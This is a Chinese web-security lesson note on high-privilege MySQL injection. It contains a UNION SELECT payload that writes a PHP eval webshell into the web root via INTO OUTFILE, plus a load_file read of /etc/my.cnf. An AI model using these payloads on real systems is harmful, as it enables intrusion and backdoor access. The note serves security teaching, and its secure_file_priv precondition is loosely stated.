风炫安全Web安全学习第十六节课 高权限sql注入getshell
sql高权限getshell
前提条件:
需要知道目标网站绝对路径
目录具有写的权限
需要当前数据库用户开启了secure_file_priv
select database() into outfile '/var/www/html/1.txt'
allen' union select 1,'<?php eval($_GET[w]); ?>' into outfile '/var/www/html/2.php' #
site: xxx.com error
写文件
into outfile 将select的结果写入到指定目录的1.txt中
在一些没有回显的注入中可以使用into outfile的结果写入文件中,然后获得权限
读文件
Load_file 函数可以读文件
select load_file('/etc/my.cnf');
参考:
(https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/)[https://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e5%8d%81%e4%ba%94%e8%8a%82%e8%af%be-%e9%ab%98%e6%9d%83%e9%99%90sql%e6%b3%a8%e5%85%a5getshell/]